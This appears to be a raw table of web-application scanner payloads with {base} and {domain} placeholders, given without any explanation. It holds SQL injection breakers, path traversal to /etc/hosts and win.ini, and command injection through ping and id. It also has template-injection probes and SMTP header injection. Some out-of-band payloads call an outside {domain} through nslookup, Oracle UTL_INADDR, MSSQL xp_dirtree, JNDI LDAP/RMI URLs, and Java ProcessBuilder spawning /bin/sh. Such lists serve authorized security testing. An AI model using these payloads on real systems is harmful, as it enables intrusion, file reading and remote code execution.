| ‘ |
| ” |
| \ |
| \\ |
| {base}-0 |
| {base}*1 |
| {base}’||’ |
| {base}’+’ |
| {base}’ ‘ |
| “ |
| “” |
| {base}”||” |
| {base}/*_*/ |
| ‘{base}’ |
| “{base}” |
| ({base}) |
| ` |
| {base}’– |
| {base}’)– |
| {base}’))– |
| {base}’# |
| {base}’)# |
| {base}’))# |
| {base}’ and ‘z’=’z |
| {base}’ or ‘z’=’z |
| {base}” or “z”=”z |
| }} |
| ${77*77} |
| {{77*77}} |
| xsstest'”>< |
| /{base} |
| ./{base} |
| ../{base} |
| /./{base} |
| /../{base} |
| xxx/../{base} |
| {base}::$DATA |
| ../../../../../../../../../../../../etc/hosts |
| ..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini |
| ../../../../../../../../../../boot.ini |
| ../../../../../../../../../../windows/win.ini |
| {base})))))))))) |
| {base}|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 & |
| {base}| ping -i 30 127.0.0.1 | |
| {base}| ping -n 30 127.0.0.1 | |
| {base}& ping -i 30 127.0.0.1 & |
| {base}& ping -n 30 127.0.0.1 & |
| {base}; ping -c 5 127.0.0.1 ; |
| {base}%0a ping -i 30 127.0.0.1 %0a |
| `ping -c 5 127.0.0.1` |
| {base}| id |
| {base}& id |
| {base}; id |
| `id` |
| ;echo 111111 |
| echo 111111 |
| response.write 111111 |
| :response.write 111111 |
| http:/// |
| %0aCc: |
| %0d%0aCc: |
| %0aBcc: |
| %0d%0aBcc: |
| {base}%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+%0aRCPT+TO:+%0aDATA%0aFrom:+%0aTo:+%0aSubject:+tst%0afoo%0a%2e%0a |
| %0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+%0d%0aRCPT+TO:+%0d%0aDATA%0d%0aFrom:+%0d%0aTo:+%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a |
| {base}”,”x”:” |
| {base}”],”x”:[“ |
| {base},”x”:1 |
| {base}” a=” |
| {base}” xmlns:xsi=” |
| {base} a=”” |
| {base}’ a=’ |
| {base}’ xmlns:xsi=’ |
| {base} |
|
| {base} |
| xsstest |
| xsstest%00″<>’ |
| {77*77} |
| {{{77*77}}} |
| ${{77*77}} |
| #{77*77} |
| [[77*77]] |
| {{=77*77}} |
| [[${77*77}]] |
| <%=77*77%> |
| ${xyz|77*77} |
| #set($x=77*77)${x} |
| @(77*77) |
|
| ${#ctx.getClass()} |
| <#assign xy=”zxxxxxxz”><#assign yx=”zyyyyyyz”>${yx}${xy} |
| nslookup {domain}& |
| `nslookup {domain}` |
| |nslookup {domain}& |
| ‘”`0&nslookup {domain}&`’ |
| &nslookup -q=cname {domain}&’\”`0&nslookup {domain}&`’ |
| +eval(“require’socket’\nSocket.gethostbyname(‘{domain}’)”)+’ |
| eval(“require’socket’\nSocket.gethostbyname(‘{domain}’)”) |
| “+eval(“require’socket’\nSocket.gethostbyname(‘{domain}’)”)+” |
| ‘+eval(compile(‘for x in range(1):\n import socket\n socket.gethostbyname(“{domain}”)’,’a’,’single’))+’ |
| eval(compile(‘for x in range(1):\n import socket\n socket.gethostbyname(“{domain}”)’,’a’,’single’)) |
| gethostbyname(‘{domain}’) |
| ‘.gethostbyname(‘{domain}’).’ |
| ‘.gethostbyname(“{domain}”).’ |
| {${gethostbyname(“{domain}”)}} |
| require(‘child_process’).exec(‘nslookup {domain}’) |
| ‘-require(‘child_process’).exec(‘nslookup {domain}’)-‘ |
| “-require(“child_process”).exec(“nslookup {domain}”)-“ |
| <% require(‘child_process’).exec(‘nslookup {domain}’); %> |
| <% require(“child_process”).exec(“nslookup {domain}”); %> |
| ||UTL_INADDR.get_host_address(‘{domain}’) |
| ‘||UTL_INADDR.get_host_address(‘{domain}’)||’ |
| ||extractvalue(xmltype(‘%xxx;]>’),’/l’) |
| ‘||extractvalue(xmltype(‘%xxx;]>’),’/l’)||’ |
| UTL_INADDR.get_host_address(ORACLE_ENCODE_STRING({domain})) |
| or chr(1)=UTL_INADDR.get_host_address(ORACLE_ENCODE_STRING({domain})) |
| extractvalue(xmltype(ORACLE_ENCODE_STRING(%xxx;]>),ORACLE_ENCODE_STRING(/l)) |
| or chr(1)=extractvalue(xmltype(ORACLE_ENCODE_STRING(%xxx;]>),ORACLE_ENCODE_STRING(/l)) |
| (select load_file(‘\\\\{domain}\\c’)) |
| ‘+(select load_file(‘\\\\{domain}\\e’))+’ |
| ;EXEC master..xp_dirtree ‘\\{domain}\s’– |
| 1;EXEC master..xp_dirtree ‘\\{domain}\s’– |
| ‘;EXEC master..xp_dirtree ‘\\{domain}\s’– |
| ‘);EXEC master..xp_dirtree ‘\\{domain}\s’– |
| ;EXEC master..xp_dirtree “\\{domain}\s”– |
| 1;EXEC master..xp_dirtree “\\{domain}\s”– |
| “;EXEC master..xp_dirtree “\\{domain}\s”– |
| “);EXEC master..xp_dirtree “\\{domain}\s”– |
| “=”;EXEC master..xp_dirtree “\\{domain}\s”– |
| “=”);EXEC master..xp_dirtree “\\{domain}\s”– |
| ;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)– |
| 1;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)– |
| ‘;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)– |
| ‘);DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)– |
| “;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)– |
| “);DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)– |
| “=”;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)– |
| “=”);DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)– |
| \’;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)– |
| \”;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)– |
| rmi://{domain}/go |
| ldap://{domain}/cn=bar,dc=test,dc=org |
| ” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance” xsi:noNamespaceSchemaLocation=”http://{domain}/x.xsd |
|
|
|
| %xx;]> |
| */–>”‘> |
| */–>”‘> |
| “–>’–>`–> |
javascript:/*![]() |
| <#assign ex=”freemarker.template.utility.Execute”?new()> ${ ex(“nslookup {domain}”) } |
| {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,””,self::clearConfig())} |
| {domain} |
| http://{domain} |
| https://{domain} |
| %20{!xmlparser v=”}%20 |
| ” {!xmlparser v=”} “ |
| “) {!xmlparser v=”} (“ |
| &shards={domain}/sr |
| #{“”.getClass().forName(“javax.script.ScriptEngineManager”).newInstance().getEngineByName(“JavaScript”).eval(“new java.lang.ProcessBuilder[\”(java.lang.String[])\”]([\”/bin/sh\”,\”-c\”,\”nslookup {domain}\”]).start()”)} |
| }#{“”.getClass().forName(“javax.script.ScriptEngineManager”).newInstance().getEngineByName(“JavaScript”).eval(“new java.lang.ProcessBuilder[\”(java.lang.String[])\”]([\”/bin/sh\”,\”-c\”,\”nslookup {domain}\”]).start()”)}#{ |
| #{”.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(‘new java.lang.ProcessBuilder[\'(java.lang.String[])\’]([\’/bin/sh\’,\’-c\’,\’nslookup {domain}\’]).start()’)} |
| }#{”.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(‘new java.lang.ProcessBuilder[\'(java.lang.String[])\’]([\’/bin/sh\’,\’-c\’,\’nslookup {domain}\’]).start()’)}#{ |
| ${“”.getClass().forName(“javax.script.ScriptEngineManager”).newInstance().getEngineByName(“JavaScript”).eval(“new java.lang.ProcessBuilder[\”(java.lang.String[])\”]([\”/bin/sh\”,\”-c\”,\”nslookup {domain}\”]).start()”)} |
| }${“”.getClass().forName(“javax.script.ScriptEngineManager”).newInstance().getEngineByName(“JavaScript”).eval(“new java.lang.ProcessBuilder[\”(java.lang.String[])\”]([\”/bin/sh\”,\”-c\”,\”nslookup {domain}\”]).start()”)}${ |
| ${”.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(‘new java.lang.ProcessBuilder[\'(java.lang.String[])\’]([\’/bin/sh\’,\’-c\’,\’nslookup {domain}\’]).start()’)} |
| }${”.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(‘new java.lang.ProcessBuilder[\'(java.lang.String[])\’]([\’/bin/sh\’,\’-c\’,\’nslookup {domain}\’]).start()’)}${ |
